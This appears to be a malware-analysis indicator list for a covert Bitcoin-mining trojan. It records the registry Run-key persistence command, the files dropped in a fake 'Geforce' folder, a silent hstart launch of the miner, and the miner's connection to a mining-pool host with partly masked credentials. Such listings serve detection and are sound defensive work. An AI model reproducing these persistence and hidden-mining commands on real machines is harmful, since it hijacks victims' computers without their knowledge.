Technical Information
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'system32' = 'C:\Geforce\system32.bat'
- 'C:\Geforce\system.exe' -t 2 -v -g yes -T 99 -o http://al###########oo.com:Aeyeeee90@50btc.com:8332
- 'C:\Geforce\hstart.exe' /NOCONSOLE /SILENT "C:\Geforce\system.exe -t 2 -v -g yes -T 99 -o http://al###########oo.com:Aeyeeee90@50btc.com:8332"
- '<SYSTEM32>\reg.exe' add "hklm\software\microsoft\windows\currentversion\run" /v "system32" /t reg_sz /d C:\Geforce\system32.bat /f
- '<SYSTEM32>\cmd.exe' /c ""C:\Geforce\system32.bat" /Geforce/system32.bat"
- C:\Geforce\system.exe
- C:\Geforce\system32.bat
- C:\Geforce\usft_ext.dll
- C:\Geforce\phatk.ptx
- C:\Geforce\hstart.exe
- C:\Geforce\miner.dll
- C:\Geforce\phatk.cl
- '50##c.com':8332
- DNS ASK 50##c.com
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''